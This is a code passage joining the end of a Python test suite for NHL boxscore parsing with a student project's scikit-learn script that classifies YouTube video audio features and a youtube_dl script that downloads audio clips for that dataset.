type(self.boxscore)._away_name = fake_away_name
assert self.boxscore.losing_name == expected_name
def test_losing_abbr_is_home(self):
expected_name = 'HOME'
flexmock(utils) \
.should_receive('_parse_abbreviation') \
.and_return(expected_name)
fake_winner = PropertyMock(return_value=AWAY)
fake_home_abbr = PropertyMock(return_value=MockName(expected_name))
type(self.boxscore).winner = fake_winner
type(self.boxscore)._home_abbr = fake_home_abbr
assert self.boxscore.losing_abbr == expected_name
def test_losing_abbr_is_away(self):
expected_name = 'AWAY'
flexmock(utils) \
.should_receive('_parse_abbreviation') \
.and_return(expected_name)
fake_winner = PropertyMock(return_value=HOME)
fake_away_abbr = PropertyMock(return_value=MockName(expected_name))
type(self.boxscore).winner = fake_winner
type(self.boxscore)._away_abbr = fake_away_abbr
assert self.boxscore.losing_abbr == expected_name
def test_invalid_away_game_winning_goals_returns_default(self):
goals = ['0', '1', 'bad']
fake_goals = PropertyMock(return_value=goals)
fake_num_skaters = PropertyMock(return_value=3)
fake_num_goalies = PropertyMock(return_value=0)
type(self.boxscore)._away_game_winning_goals = fake_goals
type(self.boxscore)._away_skaters = fake_num_skaters
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_game_winning_goals == 1
def test_invalid_away_even_strength_assists_returns_default(self):
assists = ['0', '1', 'bad']
fake_assists = PropertyMock(return_value=assists)
fake_num_skaters = PropertyMock(return_value=3)
fake_num_goalies = PropertyMock(return_value=0)
type(self.boxscore)._away_even_strength_assists = fake_assists
type(self.boxscore)._away_skaters = fake_num_skaters
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_even_strength_assists == 1
def test_invalid_home_even_strength_assists_returns_default(self):
assists = ['0', '1', 'bad']
fake_assists = PropertyMock(return_value=assists)
fake_num_skaters = PropertyMock(return_value=0)
fake_num_goalies = PropertyMock(return_value=0)
type(self.boxscore)._home_even_strength_assists = fake_assists
type(self.boxscore)._away_skaters = fake_num_skaters
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_even_strength_assists == 1
def test_invalid_away_power_play_assists_returns_default(self):
assists = ['0', '1', 'bad']
fake_assists = PropertyMock(return_value=assists)
fake_num_skaters = PropertyMock(return_value=3)
fake_num_goalies = PropertyMock(return_value=0)
type(self.boxscore)._away_power_play_assists = fake_assists
type(self.boxscore)._away_skaters = fake_num_skaters
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_power_play_assists == 1
    def test_invalid_home_power_play_assists_returns_default(self):
assists = ['0', '1', 'bad']
fake_assists = PropertyMock(return_value=assists)
fake_num_skaters = PropertyMock(return_value=0)
fake_num_goalies = PropertyMock(return_value=0)
type(self.boxscore)._home_power_play_assists = fake_assists
type(self.boxscore)._away_skaters = fake_num_skaters
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_power_play_assists == 1
def test_invalid_away_short_handed_assists_returns_default(self):
assists = ['0', '1', 'bad']
fake_assists = PropertyMock(return_value=assists)
fake_num_skaters = PropertyMock(return_value=3)
fake_num_goalies = PropertyMock(return_value=0)
type(self.boxscore)._away_short_handed_assists = fake_assists
type(self.boxscore)._away_skaters = fake_num_skaters
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_short_handed_assists == 1
    def test_invalid_home_short_handed_assists_returns_default(self):
assists = ['0', '1', 'bad']
fake_assists = PropertyMock(return_value=assists)
fake_num_skaters = PropertyMock(return_value=0)
fake_num_goalies = PropertyMock(return_value=0)
type(self.boxscore)._home_short_handed_assists = fake_assists
type(self.boxscore)._away_skaters = fake_num_skaters
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_short_handed_assists == 1
def test_invalid_url_returns_none(self):
result = Boxscore(None)._retrieve_html_page('')
assert result is None
def test_regular_season_information(self):
fields = {
'date': 'October 5, 2017',
'playoff_round': None,
'time': '7:00 PM',
'attendance': 17565,
'arena': 'TD Garden',
'duration': '2:39'
}
mock_field = """October 5, 2017, 7:00 PM
Attendance: 17,565
Arena: TD Garden
Game Duration: 2:39
Logos via Sports Logos.net / About logos
"""
m = MockBoxscoreData(MockField(mock_field))
self.boxscore._parse_game_date_and_location(m)
for field, value in fields.items():
assert getattr(self.boxscore, field) == value
def test_playoffs_information(self):
fields = {
'date': 'June 7, 2018',
'playoff_round': 'Stanley Cup Final',
'time': '8:00 PM',
'attendance': 18529,
'arena': 'T-Mobile Arena',
'duration': '2:45'
}
mock_field = """June 7, 2018, 8:00 PM
Stanley Cup Final
Attendance: 18,529
Arena: T-Mobile Arena
Game Duration: 2:45
Logos via Sports Logos.net / About logos
"""
m = MockBoxscoreData(MockField(mock_field))
self.boxscore._parse_game_date_and_location(m)
for field, value in fields.items():
assert getattr(self.boxscore, field) == value
def test_no_game_information(self):
fields = {
'date': '',
'playoff_round': None,
'time': None,
'attendance': None,
'arena': None,
'duration': None
}
mock_field = '\n'
m = MockBoxscoreData(MockField(mock_field))
self.boxscore._parse_game_date_and_location(m)
for field, value in fields.items():
assert getattr(self.boxscore, field) == value
def test_limited_game_information(self):
fields = {
'date': 'June 7, 2018',
'playoff_round': 'Stanley Cup Final',
'time': None,
'attendance': None,
'arena': 'T-Mobile Arena',
'duration': None
}
mock_field = """June 7, 2018
Stanley Cup Final
Arena: T-Mobile Arena
Logos via Sports Logos.net / About logos
"""
m = MockBoxscoreData(MockField(mock_field))
self.boxscore._parse_game_date_and_location(m)
for field, value in fields.items():
assert getattr(self.boxscore, field) == value
def test_away_shutout_single_goalies(self):
shutout = ['1', '0']
fake_shutout = PropertyMock(return_value=shutout)
fake_num_goalies = PropertyMock(return_value=1)
type(self.boxscore)._away_shutout = fake_shutout
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_shutout == 1
def test_away_shutout_multiple_goalies(self):
shutout = ['0', '1', '0']
fake_shutout = PropertyMock(return_value=shutout)
fake_num_goalies = PropertyMock(return_value=2)
type(self.boxscore)._away_shutout = fake_shutout
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_shutout == 1
def test_away_shutout_multiple_goalies_empty_field(self):
shutout = ['', '1', '0']
fake_shutout = PropertyMock(return_value=shutout)
fake_num_goalies = PropertyMock(return_value=2)
type(self.boxscore)._away_shutout = fake_shutout
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_shutout == 1
def test_home_shutout_single_goalies(self):
shutout = ['0', '1']
fake_shutout = PropertyMock(return_value=shutout)
fake_num_goalies = PropertyMock(return_value=1)
type(self.boxscore)._home_shutout = fake_shutout
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_shutout == 1
def test_home_shutout_multiple_goalies(self):
shutout = ['0', '0', '1']
fake_shutout = PropertyMock(return_value=shutout)
fake_num_goalies = PropertyMock(return_value=1)
type(self.boxscore)._home_shutout = fake_shutout
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_shutout == 1
def test_home_shutout_multiple_goalies_empty_field(self):
shutout = ['0', '', '1']
fake_shutout = PropertyMock(return_value=shutout)
fake_num_goalies = PropertyMock(return_value=1)
type(self.boxscore)._home_shutout = fake_shutout
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_shutout == 1
def test_away_saves_single_goalies(self):
saves = ['29', '30']
fake_saves = PropertyMock(return_value=saves)
fake_num_goalies = PropertyMock(return_value=1)
type(self.boxscore)._away_saves = fake_saves
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_saves == 29
    def test_away_saves_multiple_goalies(self):
saves = ['29', '3', '30']
fake_saves = PropertyMock(return_value=saves)
fake_num_goalies = PropertyMock(return_value=2)
type(self.boxscore)._away_saves = fake_saves
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_saves == 32
def test_away_saves_multiple_goalies_empty_field(self):
saves = ['29', '', '30']
fake_saves = PropertyMock(return_value=saves)
fake_num_goalies = PropertyMock(return_value=2)
type(self.boxscore)._away_saves = fake_saves
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.away_saves == 29
def test_home_saves_single_goalies(self):
saves = ['29', '30']
fake_saves = PropertyMock(return_value=saves)
fake_num_goalies = PropertyMock(return_value=1)
type(self.boxscore)._home_saves = fake_saves
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_saves == 30
    def test_home_saves_multiple_goalies(self):
saves = ['29', '3', '30']
fake_saves = PropertyMock(return_value=saves)
fake_num_goalies = PropertyMock(return_value=1)
type(self.boxscore)._home_saves = fake_saves
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_saves == 33
def test_home_saves_multiple_goalies_empty_field(self):
saves = ['29', '30', '']
fake_saves = PropertyMock(return_value=saves)
fake_num_goalies = PropertyMock(return_value=1)
type(self.boxscore)._home_saves = fake_saves
type(self.boxscore)._away_goalies = fake_num_goalies
assert self.boxscore.home_saves == 30
def test_away_save_percentage(self):
fake_saves = PropertyMock(return_value=30)
fake_shots_on_goal = PropertyMock(return_value=33)
type(self.boxscore).away_saves = fake_saves
type(self.boxscore).home_shots_on_goal = fake_shots_on_goal
assert self.boxscore.away_save_percentage == 0.909
def test_away_save_percentage_zero_shots(self):
fake_saves = PropertyMock(return_value=0)
fake_shots_on_goal = PropertyMock(return_value=0)
type(self.boxscore).away_saves = fake_saves
type(self.boxscore).home_shots_on_goal = fake_shots_on_goal
assert self.boxscore.away_save_percentage == 0.0
def test_home_save_percentage(self):
fake_saves = PropertyMock(return_value=30)
fake_shots_on_goal = PropertyMock(return_value=33)
type(self.boxscore).home_saves = fake_saves
type(self.boxscore).away_shots_on_goal = fake_shots_on_goal
assert self.boxscore.home_save_percentage == 0.909
def test_home_save_percentage_zero_shots(self):
fake_saves = PropertyMock(return_value=0)
fake_shots_on_goal = PropertyMock(return_value=0)
type(self.boxscore).home_saves = fake_saves
type(self.boxscore).away_shots_on_goal = fake_shots_on_goal
assert self.boxscore.home_save_percentage == 0.0
def test_no_class_information_returns_dataframe_of_none(self):
mock_goals = PropertyMock(return_value=None)
type(self.boxscore)._away_goals = mock_goals
type(self.boxscore)._home_goals = mock_goals
assert self.boxscore.dataframe is None
class TestNHLBoxscores:
@patch('requests.get', side_effect=mock_pyquery)
def setup_method(self, *args, **kwargs):
flexmock(Boxscores) \
.should_receive('_get_team_details') \
.and_return((None, None, None, None, None, None))
flexmock(Boxscores) \
.should_receive('_find_games') \
.and_return(None)
self.boxscores = Boxscores(None)
def test_improper_loser_boxscore_format_skips_game(self):
mock_html = pq("""<table class="teams">
<tbody>
<tr class="loser">
<td class="right">1</td>
<td class="right gamelink">
</td>
</tr>
<tr class="winner">
<td><a href="/teams/DET/2019.html">Detroit Red Wings</a></td>
<td class="right">3</td>
<td class="right">
</td>
</tr>
</tbody>
</table>""")
games = self.boxscores._extract_game_info([mock_html])
assert len(games) == 0
def test_improper_winner_boxscore_format_skips_game(self):
mock_html = pq("""<table class="teams">
<tbody>
<tr class="loser">
<td><a href="/teams/LAK/2019.html">Los Angeles Kings</a></td>
<td class="right">1</td>
<td class="right gamelink">
<a href="/boxscores/201812100DET.html">Final</a>
</td>
</tr>
<tr class="winner">
<td class="right">3</td>
<td class="right">
</td>
</tr>
</tbody>
</table>""")
games = self.boxscores._extract_game_info([mock_html])
assert len(games) == 0
``` |
{
"source": "JosephDevaney/FYP",
"score": 3
} |
#### File: JosephDevaney/FYP/Classification.py
```python
from sklearn import tree
from sklearn.naive_bayes import GaussianNB, MultinomialNB, BernoulliNB
from sklearn import svm
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
from sklearn.metrics import classification_report
from sklearn.cross_validation import StratifiedKFold
from sklearn.cross_validation import cross_val_score
from sklearn.cross_validation import cross_val_predict
from sklearn.feature_selection import f_classif
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import SelectPercentile
from sklearn.decomposition import PCA
from sklearn.decomposition import TruncatedSVD
from sklearn.decomposition import KernelPCA
from sklearn.decomposition import RandomizedPCA
from hmmlearn import hmm
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier
import numpy as np
import scipy.fftpack as fft
from VideoFeatures import VideoFeatures
import WnLFeatures as wnl
import pickle as pkl
import time
import gc
# These should be loaded from the config file
CONF_FILE = "config.txt"
REG_FEATS = "features.ftr"
SHORT_FEATS = "features30sec.ftr"
# This function instantiates the desired classifier object and returns it.
# If the options are not loaded the user is prompted for the decision
def get_classifier_from_cmd(cls=None):
if cls is None:
print("Please select the number that corresponds to the desired Classifier:")
print("1. Decision Tree")
print("2. Naive Bayes")
print("3. SVM")
print("4. kNN")
print("5. Random Forest")
        cls = input()
cls_opts = [x for x in cls.split('|')]
cls = int(cls_opts[0])
if cls == 1:
classifier = tree.DecisionTreeClassifier(criterion="entropy")
elif cls == 2:
# NB
# classifier = GaussianNB()
# classifier = MultinomialNB()
classifier = BernoulliNB()
elif cls == 3:
# SVM
opts = [x for x in cls_opts[1].split('$')]
gm = 'auto'
if opts[0] in ['rbf', 'poly', 'sigmoid']:
if opts[2] != 'auto':
gm = float(opts[2])
classifier = svm.SVC(kernel=opts[0], decision_function_shape=opts[1], gamma=gm)
elif cls == 4:
opts = [x for x in cls_opts[1].split('$')]
classifier = KNeighborsClassifier(n_neighbors=int(opts[0]), algorithm='ball_tree', weights=opts[1], leaf_size=int(opts[2]))
elif cls == 5:
classifier = RandomForestClassifier(criterion="entropy")
return classifier
# This function builds the matrix of features per instance and returns it.
# Pads individual features with 0's to ensure each instance has the same number of columns/features
# Tracks the columns that will have a feature reduction applied and the amount this will be.
def get_feature_choice_cmd(ftr=None, ftr_sel=None, path=None, cls=None, win_len=None):
if ftr is None:
print("Please select the feature (Separated by | for multiple):")
print("1. Beat Variance Ratio")
print("2. Silence Ratio")
print("3. MFCC")
print("4. MFCC Delta")
print("5. Chromagram")
print("6. Spectroid")
print("7. FFT average over 1s window")
print("8. ZCR over window")
print("9. MFCC over window")
ftr = input()
        choices = ftr.split('|')
        ftr = [int(opt.split('$')[0]) for opt in choices]
        ftr_sel = {int(opt.split('$')[0]): int(opt.split('$')[1]) for opt in choices}
if path is None:
        path = [input("Enter path to features: \n")]
if cls is None:
cls = ["Entertainment", "Music", "Comedy", "Film & Animation", "News & Politics", "Sports", "People & Blogs",
"Howto & Style", "Pets & Animals"]
if win_len is None:
win_len = 0.04
start = True
# features = np.empty(shape=(0, 0))
features = {}
f_max_len = {}
classes = {}
# Path is an array containing potentially multiple features files that can be used to load Video objects from disk.
for p in path:
with open(p + SHORT_FEATS, "rb") as inp:
unpickle = pkl.Unpickler(inp)
count = 0
# Create the UnPickler object and loop until there are no objects left in the file. Break from loop then.
while True:
try:
cur_feature = {}
vid = unpickle.load()
# If video is in the approved class list add all selected features to a dictionary cur_feature
if vid.get_category_from_name() in cls:
count += 1
if 1 in ftr:
cur_feature[1] = vid.bvratio
if 2 in ftr:
cur_feature[2] = vid.silence_ratio
if 3 in ftr:
cur_feature[3] = np.array(vid.mfcc).reshape((1, -1))[0]
if 4 in ftr:
cur_feature[4] = np.array(vid.mfcc_delta).reshape((1, -1))[0]
if 5 in ftr:
cur_feature[5] = np.array(vid.chromagram).reshape((1, -1))[0]
if 6 in ftr:
cur_feature[6] = vid.spectroid[0]
if 7 in ftr:
cur_feature[7] = vid.get_windowed_fft(int(np.ceil(vid.rate * win_len)))
if 8 in ftr:
cur_feature[8] = vid.get_windowed_zcr(int(np.ceil(vid.rate * win_len)))
if 9 in ftr:
cur_feature[9] = np.array(wnl.get_window_mfcc(vid.mfcc, int(np.ceil(vid.rate * win_len)))) \
.reshape((1, -1))[0]
# This section was designed under the assumption that the features could be returned in various
# 2d layouts. It essentially checks the size of the current feature against the largest
# number of columns so far. It then pads the smaller one with 0's
# This can definitely be refactored into simpler, more readable code.
if start:
for i in ftr:
features[i] = np.array([cur_feature[i]])
f_shape = features[i].shape
if hasattr(cur_feature[i], "__len__"):
if len(f_shape) > 1:
f_max_len[i] = f_shape[1]
else:
f_max_len[i] = len(f_shape)
start = False
# classes = np.array(vid.get_category_from_name())
classes[i] = [vid.get_category_from_name()]
else:
for i in ftr:
if hasattr(cur_feature[i], "__len__"):
if len(cur_feature[i].shape) > 1:
if cur_feature[i].shape[1] > f_max_len[i]:
if len(features[i].shape) > 1:
features[i] = np.pad(features[i],
((0, 0), (0, cur_feature[i].shape[1] - f_max_len[i])),
mode="constant")
f_max_len[i] = cur_feature[i].shape[1]
else:
features[i] = np.pad(features[i],
(0, cur_feature[i].shape[1] - f_max_len[i]),
mode="constant")
f_max_len[i] = cur_feature[i].shape[1]
elif cur_feature[i].shape[1] < f_max_len[i]:
cur_feature[i] = np.pad(cur_feature[i],
((0, 0), (0, f_max_len[i] - cur_feature[i].shape[1])),
mode="constant")
elif len(cur_feature[i].shape) == 1:
if cur_feature[i].shape[0] > f_max_len[i]:
if len(features[i].shape) > 1:
features[i] = np.pad(features[i],
((0, 0), (0, cur_feature[i].shape[0] - f_max_len[i])),
mode="constant")
f_max_len[i] = cur_feature[i].shape[0]
else:
features[i] = np.pad(features[i],
(0, cur_feature[i].shape[0] - f_max_len[i]),
mode="constant")
f_max_len[i] = cur_feature[i].shape[0]
elif cur_feature[i].shape[0] < f_max_len[i]:
cur_feature[i] = np.pad(cur_feature[i],
(0, f_max_len[i] - cur_feature[i].shape[0]),
mode="constant")
features[i] = np.vstack((features[i], [cur_feature[i]]))
# classes = np.append(classes, [vid.get_category_from_name()])
classes[i].append(vid.get_category_from_name())
except EOFError:
print("EOF")
break
except TypeError:
print("Unable to load object")
except pkl.UnpicklingError:
print("Unable to load object2")
gc.collect()
# Join each feature into one large array.
# Keep track of the indices for each feature that needs reduction applied later
select_ind = []
print("Count = ", count)
total_feature = features[ftr[0]]
if ftr_sel[ftr[0]] > 0:
select_ind = [(0, len(total_feature[0]), ftr_sel[ftr[0]])]
for i in range(1, len(ftr)):
if ftr_sel[ftr[i]] > 0:
start = len(total_feature[0])
select_ind.append((start, start + len(features[ftr[i]][0]), ftr_sel[ftr[i]]))
total_feature = np.hstack((total_feature, features[ftr[i]]))
# targets = np.array(classes)
targets = [value for key, value in classes.items()]
return total_feature, targets[0], select_ind
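# Illustrative sketch (not part of the original project) of the padding
# done in the loop above: grow the accumulated matrix on the right with
# zeros so a longer incoming feature row can be stacked onto it.
#
#   feats = np.ones((3, 4))                                   # 3 x 4
#   new_row = np.ones(6)                                      # length 6
#   feats = np.pad(feats, ((0, 0), (0, 2)), mode="constant")  # now 3 x 6
#   feats = np.vstack((feats, [new_row]))                     # 4 x 6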
# Apply the feature selection to the features matrix as necessary.
def feature_selection(features, select_ind, targets):
start_sel = True
last_ind = 0
feat2 = features
for inds in select_ind:
# If this is the first loop check if the first feature to be reduced is not the first index.
# If so add all features up to that point to an array and track the original indices also
# Do the same if it is not the first loop, but the next reduce index is > the last index
if start_sel:
if inds[0] > 0:
feat2 = features[:, 0:inds[0]]
total_supp = np.arange(0, inds[0])
# total_supp = np.ones(inds[0], dtype=bool)
start_sel = False
last_ind = inds[0]
elif inds[0] > last_ind:
feat2 = np.hstack((feat2, features[:, last_ind:inds[0]]))
total_supp = np.hstack((total_supp, np.arange(last_ind, inds[0] + 1)))
# total_supp = np.hstack((total_supp, np.ones((inds[0]-last_ind), dtype=bool)))
# Get the number of columns to retain and create object
        size = int((inds[1] - inds[0]) / inds[2])
skb = SelectKBest(score_func=f_classif, k=size)
# skb = SelectPercentile(score_func=f_classif, percentile=inds[2])
# slice out the columns relating to the current feature
f = features[:, inds[0]:inds[1]]
# Return an array of the selected features. Get the indices and add them to an array
f_select = skb.fit_transform(f, targets)
# skb.fit(f, targets)
# f_select = skb.transform(f)
f_supp = skb.get_support(indices=True)
f_supp += last_ind
if start_sel:
feat2 = f_select
total_supp = f_supp
start_sel = False
else:
feat2 = np.hstack((feat2, f_select))
total_supp = np.hstack((total_supp, f_supp))
last_ind = inds[1]
return feat2, total_supp
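# Illustrative sketch (not from the original project): SelectKBest keeps
# the k highest-scoring columns of a slice, and get_support(indices=True)
# reports which original column indices survived so the same columns can
# be sliced out of the test set later.
#
#   X = np.random.rand(20, 8)                  # one feature's column block
#   y = np.random.randint(0, 2, 20)            # class labels
#   skb = SelectKBest(score_func=f_classif, k=4)
#   X_kept = skb.fit_transform(X, y)           # 20 x 4
#   kept_cols = skb.get_support(indices=True)  # e.g. array([0, 2, 5, 7])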
# Perform PCA on the desired features
def feature_reduction_fit(features, select_ind, red_pca, fit=False):
start_sel = True
last_ind = 0
feat2 = features
for inds in select_ind:
if start_sel:
if inds[0] > 0:
feat2 = features[:, 0:inds[0]]
start_sel = False
elif inds[0] > last_ind:
feat2 = np.hstack((feat2, features[:, last_ind:inds[0]]))
# If this is the training set, fit the data to the object before transforming.
# If its not then just transform
# Create the new array and return it and the PCA objects
if fit:
red_pca[inds[0]].fit(features[:, inds[0]:inds[1]])
f_reduct = red_pca[inds[0]].transform(features[:, inds[0]:inds[1]])
if start_sel:
feat2 = f_reduct
start_sel = False
else:
feat2 = np.hstack((feat2, f_reduct))
last_ind = inds[1]
return feat2, red_pca
def main():
clf_choice = None
ftr_choice = None
ftr_sel = None
win_len = None
    path = None
    opts = []
    cls_choice = None
# If the config.txt file exists, extract the options from it.
try:
opts = [line.strip('\n') for line in open(CONF_FILE)]
clf_choice = opts[0]
use_cv = int(opts[1].split('$')[0])
num_folds = int(opts[1].split('$')[1])
        ftr_choice = [int(setting.split('$')[0]) for setting in opts[2].split('|')]
        ftr_sel = {int(setting.split('$')[0]): int(setting.split('$')[1]) for setting in opts[2].split('|')}
win_len = float(opts[3])
reduction_choice = int(opts[4])
path = [f for f in opts[5].split('$')]
cls_choice = [x for x in opts[6].split('|')]
Num_tests = int(opts[7])
    except FileNotFoundError:
        # No config file found: prompt for the remaining run parameters so
        # the cross-validation path below is still runnable.
        use_cv = int(input("Enter 1 to use Stratified Kfold CV: \n"))
        num_folds = int(input("Enter the number of folds: \n"))
        reduction_choice = int(input("Enter 1 for SelectKBest, 2 for PCA or 0 for none: \n"))
        Num_tests = int(input("Enter the number of test iterations: \n"))
clf = get_classifier_from_cmd(clf_choice)
features, targets, select_ind = get_feature_choice_cmd(ftr=ftr_choice, ftr_sel=ftr_sel, path=path, cls=cls_choice,
win_len=win_len)
numtest = {}
train_t = []
test_t = []
test_ind = []
train_ind = []
print("*****Starting to Test*****")
# In practice this option is never taken
if use_cv != 1:
for i in range(0, len(targets)):
t = targets[i]
if t not in numtest:
numtest[t] = 0
if numtest[t] < 2:
test_ind.append(i)
test_t.append(targets[i])
numtest[t] += 1
else:
train_ind.append(i)
train_t.append(targets[i])
train_f = features[train_ind]
# train_t = targets[train_ind]
test_f = features[test_ind]
# test_t = targets[test_ind]
# train_f = features
# train_t = targets
# test_f = features
# test_t = targets
# clf = clf.fit(features[: int(len(features)/10)], targets[: int(len(features)/10)])
# predictions = clf.predict(features[- int(len(features)/10):], targets[- int(len(features)/10):])
clf = clf.fit(train_f, train_t)
predictions = clf.predict(test_f)
print("Accuracy is : " + str(accuracy_score(test_t, predictions)))
print("----------------------------")
print("Confusion Matrix: ")
print(confusion_matrix(test_t, predictions))
print("\n\n")
else:
# perform total classification for the specified number of iterations
for _ in range(Num_tests):
skf = StratifiedKFold(targets, n_folds=num_folds)
# result = cross_val_score(clf, features, targets, cv=skf)
filename = time.strftime("Tests\\%Y_%m_%d__%H_%M_%S", time.gmtime()) + '.txt'
savefile = open(filename, 'w+')
        if opts:
savefile.write("Options for this experiment are as follows: \n")
savefile.write(str(opts) + '\n\n')
# savefile.write("Total Accuracy: %0.2f (+/- %0.2f)\n\n" % (result.mean(), result.std() * 2))
# preds = cross_val_predict(clf, features, targets, cv=skf)
# cor_preds = targets[skf]
start_cls = True
total_targets = []
total_preds = []
for train_i, test_i in skf:
# print("Predicted: " + preds[i] + "\t|\tCorrect Class: " + cor_preds[i])
train_target = [targets[x] for x in train_i]
train_feats = features[train_i]
# Choose Selection or PCA reduction
if reduction_choice == 1:
train_feats, train_supp = feature_selection(features[train_i], select_ind, train_target)
elif reduction_choice == 2:
reduct_pca = {}
for inds in select_ind:
size = int((inds[1] - inds[0]) / inds[2])
reduct_pca[inds[0]] = PCA(size)
# reduct_pca[inds[0]] = TruncatedSVD(n_components=size)
# reduct_pca[inds[0]] = KernelPCA(n_components=size, kernel='linear')
# reduct_pca[inds[0]] = RandomizedPCA(n_components=size)
train_feats, reduct_pca = feature_reduction_fit(features[train_i], select_ind, reduct_pca, fit=True)
# Fit the model to the training data
clf = clf.fit(train_feats, train_target)
# Prepare the test data in the same format as the training data
test_target = [targets[x] for x in test_i]
test_feats = features[test_i, :]
if reduction_choice == 1:
test_feats = test_feats[:, train_supp]
elif reduction_choice == 2:
test_feats, reduct_pca = feature_reduction_fit(features[test_i], select_ind, reduct_pca)
# Test the model of test set. Calculate the Accuracy Score and Confusion Matrix
# Accuracy score will have the mean of all results calculated. CM will be summed.
preds = clf.predict(test_feats)
sc = accuracy_score(test_target, preds)
cm = confusion_matrix(test_target, preds)
if start_cls:
total_confusion = cm
total_score = sc
start_cls = False
else:
total_confusion += cm
total_score += sc
total_targets.extend(test_target)
total_preds.extend(preds)
acc = str(accuracy_score(test_target, preds))
# gc.collect()
# print("Took out the trash!!")
# savefile.write("Accuracy is : " + acc)
# savefile.write("\n----------------------------\n")
# savefile.write("Confusion Matrix: \n")
# savefile.write(str(cm))
# savefile.write('\n\n')
#
# savefile.write("%-25s %s\n" % ("Target", "Prediction"))
# savefile.write("----------------------------------\n")
# [savefile.write("%-25s %s\n" % (c1, c2)) for c1, c2 in zip(test_target, preds[test_i])]
# savefile.write('\n\n')
avg_score = total_score / num_folds
savefile.write("Total Accuracy: %0.10f \n\n" % avg_score)
savefile.write("Summed CMs\n--------------------\n")
savefile.write(str(total_confusion))
# savefile.write("\n\nFinal CM from aggregate targets\n-----------------------------\n")
# savefile.write(str(confusion_matrix(total_targets, total_preds)))
unique_cls = []
[unique_cls.append(x) for x in total_targets if x not in unique_cls]
savefile.write("\n\nREPORT!!!\n-----------------------------------\n")
savefile.write(classification_report(total_targets, total_preds))
savefile.write("%-25s %s\n" % ("Target", "Prediction"))
savefile.write("----------------------------------\n")
[savefile.write("%-25s %s\n" % (c1, c2)) for c1, c2 in zip(total_targets, total_preds)]
savefile.write('\n\n')
savefile.close()
if __name__ == "__main__":
main()
# D:\Documents\DT228_4\FYP\Datasets\Test\
# D:\Documents\DT228_4\FYP\Datasets\080327\0_Audio
```
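main() above expects an eight-line config.txt whose lines map to opts[0] through opts[7]. The sketch below writes a hypothetical file consistent with that parsing; every concrete value (classifier options, feature ids, paths, classes) is an illustrative assumption rather than a setting from the project:
```python
# Each line maps to opts[0]..opts[7] in main(); all values are assumed.
sample_config = "\n".join([
    "4|5$distance$30",       # classifier: 4 = kNN, then k$weights$leaf_size
    "1$10",                  # use_cv $ num_folds
    "3$4|7$2",               # features: id$reduction_factor, '|'-separated
    "0.04",                  # analysis window length in seconds
    "2",                     # reduction: 1 = SelectKBest, 2 = PCA
    "D:\\feats\\setA\\$D:\\feats\\setB\\",  # feature paths, '$'-separated
    "Music|Sports|Comedy",   # categories to keep
    "5",                     # number of repeated experiments
])
with open("config.txt", "w") as conf:
    conf.write(sample_config)
```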
#### File: JosephDevaney/FYP/VideoDownloader.py
```python
import youtube_dl
import numpy as np
import DatasetStats as dss
import os
from VideoFeatures import VideoFeatures
YT_PREFIX = "https://www.youtube.com/watch?v="
def load_classes():
return [cl.strip('\n') for cl in open("classes.txt") if cl]
# Setup options and call the library
def download(v_id, cat, time, dir, options):
print("Starting Download of " + v_id + "***")
options['outtmpl'] = dir + '\\' + cat + '_' + v_id + '_' + time + '.%(ext)s'
options['-w'] = True
try:
with youtube_dl.YoutubeDL(options) as ydl:
ydl.download([v_id])
print("***Download Complete***")
return True
    except Exception:
print("***Unable to Download***")
return False
# Parses Text file and extracts necessary URL
# Checks for existing file at specified location and ignores duplicate files.
# Allows user to specify number of videos per class
# Currently only selects videos between 30 and 240 seconds
def main():
classes = load_classes()
datafile = input("Please enter the location of the datafile: \n")
num_vids_per_cat = int(input("Required number of videos per category : \n"))
print("Loading statistics from existing dataset")
stats = dss.analyse_features()
dss.print_stats(stats)
# stats = {}
videodata = [[val for val in line.split('\t')] for line in open(datafile) if line]
videolinks = np.array([[v[0], v[3], v[4]] for v in videodata if len(v) > 4])
savedir = input("Please enter the directory that will store the downloads: \n")
f_names = [f for f in os.listdir(savedir) if f.endswith('.wav')]
yt_opts = {
'format': 'bestaudio/best',
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'wav',
}]
}
for video in videolinks:
vid_link = video[0]
vid_cat = video[1]
vid_len = video[2]
v_name = vid_cat + '_' + vid_link + '_' + vid_len + '.wav'
if vid_cat in classes:
if vid_cat not in stats:
stats[vid_cat] = [0, 0]
if stats[vid_cat][0] < num_vids_per_cat and v_name not in f_names and 30 <= int(vid_len) <= 240:
if download(vid_link, vid_cat, vid_len, savedir, yt_opts):
stats[vid_cat][0] += 1
stats[vid_cat][1] += int(vid_len)
dss.print_stats(stats)
if __name__ == "__main__":
main()
# D:\Documents\DT228_4\FYP\Datasets\080327\1.txt
# D:\Documents\DT228_4\FYP\Datasets\080327\0_Audio
# D:\Documents\DT228_4\FYP\Datasets\080327\0_Audio2
``` |
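main() above reads a tab-separated datafile and keeps columns 0, 3 and 4 as the video id, category and length in seconds. A hypothetical row consistent with that parsing (the id and values are placeholders, not real dataset entries):
```python
# Columns: id, uploader, age, category, length, ... (only 0, 3, 4 are used).
row = "abc123XYZ_0\tsomeuser\t583\tMusic\t186\t1000".split('\t')
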